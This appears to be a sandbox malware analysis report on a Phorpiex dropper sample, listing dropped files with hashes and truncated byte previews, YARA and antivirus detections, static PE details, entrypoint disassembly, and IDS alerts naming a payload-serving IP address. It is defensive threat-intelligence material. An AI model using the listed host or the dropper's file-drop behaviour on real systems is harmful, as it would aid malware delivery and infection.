                                                                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                  C:\Users\user\AppData\Local\Temp\229472814.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110600
                                                                                                                                  Entropy (8bit):7.998486619051527
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                  MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                  SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                  SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                  SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                  C:\Users\user\AppData\Local\Temp\264162301.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110600
                                                                                                                                  Entropy (8bit):7.998486619051527
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                  MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                  SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                  SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                  SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                  C:\Users\user\AppData\Local\Temp\33080.scr

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Bjl3geiFEK.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85504
                                                                                                                                  Entropy (8bit):6.394560338648692
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                  MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                  SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                  SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\33080.scr, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: thcdVit1dX.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\818921588.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85504
                                                                                                                                  Entropy (8bit):6.394560338648692
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                  MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                  SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                  SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rddolps.u41.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdgt3o4r.xla.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ol2t3fun.mdp.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbs1l3jm.nlg.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\tbtcmds.dat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):286
                                                                                                                                  Entropy (8bit):7.369827619940847
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:JI+cPhYsQuLyuCFmYRhegKv12u5JRn2BtmlFnI0QBIzxN0wi4HvvL:GvhouGFredJcBsjDqIdN0wiQvT
                                                                                                                                  MD5:3DEA10446B12B8B16638C64ADEE9CF7D
                                                                                                                                  SHA1:79E5EBA41FFD6D6D0C633E9851FF2BC8B6FCAEA7
                                                                                                                                  SHA-256:E178E70155316BFFABAD28DB3DAF9F60A878243C5F3B8A59E37ADC7664F1A669
                                                                                                                                  SHA-512:5247BEFA86704AEEB1ED782F025BD9B474E14F6A83E0E2B6DD4DC8800C23788FE2CA770AEBF8F4C0C0B5BE81311A0ABF9385F182FB7D0379094FCDD565B7C56D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:y..6+....S.i...:g..(.J-j*..x(..K*ec..p....$...:'......u....Y.....pt."..?....2.A.xa.|.Jor....W....Itk..S.R.>.DWE5..c...".3.FC.!o7\......Sl.k........'..l..F.M.......B..b..-..r.....[R..F. z".K..F.8x........l; ....]....Z.. !D.X.L.Y.t..#..k..y.R^o..ve.mOnsU...~o..J..mhd..

                                                                                                                                  C:\Users\user\tbtnds.dat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4096
                                                                                                                                  Entropy (8bit):4.857793737646147
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:2gqanIbioTgWZbe7N8vNhsCaQ7u+UJP20vOyngHj6/Twc:2gqBbiyLZbe7NkNhsl+UQfkc6/TV
                                                                                                                                  MD5:3DA419EFB5200FD83F4E8AD73B944854
                                                                                                                                  SHA1:7524988CDCAA95D900066FC16634286E7B62A5D0
                                                                                                                                  SHA-256:08F2912869279FC4AA37994EE4E3366ECA333B2E20CB1EB48D5FA9DF0157E0AF
                                                                                                                                  SHA-512:D179C81A8C69D7553098C59A092CFAA4ED758256B99078F3CC14A72F46BFADF2C52645DB6B7DCD772091BFF336071902B3A7D434068BCA211E9DAE2EB6983F4A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..rYs.PT....s.PT]vc.p.PT....o.PTY+.o.PT....n.PTZ..=m.PT..4.k.PT..[.k.PT...h.PTf...g.PT..|.e.PT.k..d.PT...od.PT.C/.d.PT....d.PT....d.PT..[W.....G.(......[o...._:.....N.G.....Z......%.}B....M_./.....................c.g....U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X.............E.....Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R.......c......N'.y............Z..7....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e............#H......]5.......cw....\/.....m.7.....Z..........?....-.|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....Y.>^....

                                                                                                                                  C:\Windows\sysppvrdnvs.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\33080.scr
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85504
                                                                                                                                  Entropy (8bit):6.394560338648692
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                  MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                  SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                  SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):5.33877409925911
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Bjl3geiFEK.exe
                                                                                                                                  File size:10'240 bytes
                                                                                                                                  MD5:ed9fbbbe548c41479cb70e4d694793d0
                                                                                                                                  SHA1:a0bde162d2241ab2acb58544511a41df30a096a7
                                                                                                                                  SHA256:6fc8b5b8a90cf8ba7e0eb930fcdde776f8eeb3f37913318df7766a365e13fa8e
                                                                                                                                  SHA512:49652367fec13a1e7a188fd039bf8a9fae6be72fdc31e7597bbcfdf30375277f6a7e09b74bd5a2adf1696cf720998c751b7e1671afa3a59c4dfa7069bca543fb
                                                                                                                                  SSDEEP:192:Jd94uPG8E1CDSnzmgp+eMwY46BJxT43thW:394u5SCDSnJo+c83
                                                                                                                                  TLSH:0C222A1EDD4B50A1F3AE0AF087B285DD47FC95031395A0F7FFA298A44F66382B0D2069
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........fW...9...9...9...B...9.......9...8...9.......9.......9.......9.......9.Rich..9.................PE..L...P[.g...................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x401997
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x671F5B50 [Mon Oct 28 09:37:20 2024 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:74ac793950a4fcbef2c9afe64363e7af

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  call 00007FDD04DF4C81h
                                                                                                                                  jmp 00007FDD04DF463Bh
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                  cmp dword ptr [eax], E06D7363h
                                                                                                                                  jne 00007FDD04DF492Ch
                                                                                                                                  cmp dword ptr [eax+10h], 03h
                                                                                                                                  jne 00007FDD04DF4926h
                                                                                                                                  mov eax, dword ptr [eax+14h]
                                                                                                                                  cmp eax, 19930520h
                                                                                                                                  je 00007FDD04DF4917h
                                                                                                                                  cmp eax, 19930521h
                                                                                                                                  je 00007FDD04DF4910h
                                                                                                                                  cmp eax, 19930522h
                                                                                                                                  je 00007FDD04DF4909h
                                                                                                                                  cmp eax, 01994000h
                                                                                                                                  jne 00007FDD04DF4907h
                                                                                                                                  call 00007FDD04DF4CD6h
                                                                                                                                  xor eax, eax
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  push 004019A1h
                                                                                                                                  call dword ptr [0040201Ch]
                                                                                                                                  xor eax, eax
                                                                                                                                  ret
                                                                                                                                  int3
                                                                                                                                  jmp dword ptr [004020B4h]
                                                                                                                                  push 00000014h
                                                                                                                                  push 00402340h
                                                                                                                                  call 00007FDD04DF4B6Dh
                                                                                                                                  push dword ptr [00403384h]
                                                                                                                                  mov esi, dword ptr [00402064h]
                                                                                                                                  call esi
                                                                                                                                  pop ecx
                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                  cmp eax, FFFFFFFFh
                                                                                                                                  jne 00007FDD04DF490Eh
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  call dword ptr [004020C0h]
                                                                                                                                  pop ecx
                                                                                                                                  jmp 00007FDD04DF4969h
                                                                                                                                  push 00000008h
                                                                                                                                  call 00007FDD04DF4C97h
                                                                                                                                  pop ecx
                                                                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                                                                  push dword ptr [00403384h]
                                                                                                                                  call esi
                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                  push dword ptr [00403380h]
                                                                                                                                  call esi
                                                                                                                                  pop ecx
                                                                                                                                  pop ecx
                                                                                                                                  mov dword ptr [ebp-20h], eax
                                                                                                                                  lea eax, dword ptr [ebp-20h]
                                                                                                                                  push eax
                                                                                                                                  lea eax, dword ptr [ebp-1Ch]
                                                                                                                                  push eax
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  mov esi, dword ptr [00402078h]
                                                                                                                                  call esi

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x237c0x50.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2b0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x1c8.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22b80x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000xd8.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000xef40x1000730fd9b74105a97bf43e80cbec48918bFalse0.600830078125data5.964755034376729IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x20000x8140xa00112e404fd7f80bae78b2c35dab689980False0.424609375data4.4687440334696635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x30000x38c0x200202a0f14ba4a024e6a35d5895669b769False0.060546875data0.35275948821577235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x40000x2b00x400554d0cedd69e96ee00c8324ce4da604cFalse0.3623046875data5.194459669718395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0x50000x2200x4008cbd97ec4739a9330e237d2237460805False0.4501953125data3.723355327874369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_MANIFEST0x40580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  MSVCR90.dll?terminate@@YAXXZ, _unlock, __dllonexit, _lock, __set_app_type, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, _encode_pointer, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, mbstowcs, _onexit, rand
                                                                                                                                  KERNEL32.dllUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, QueryPerformanceCounter, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, Sleep, DeleteFileW, MoveFileW, LoadLibraryA, GetProcAddress, GetTickCount, FreeLibrary, IsDebuggerPresent
                                                                                                                                  USER32.dllFindWindowA, wsprintfW

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-10-28T11:11:11.839337+01002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.449731TCP
                                                                                                                                  2024-10-28T11:11:12.755493+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11185.215.113.6680192.168.2.449730TCP
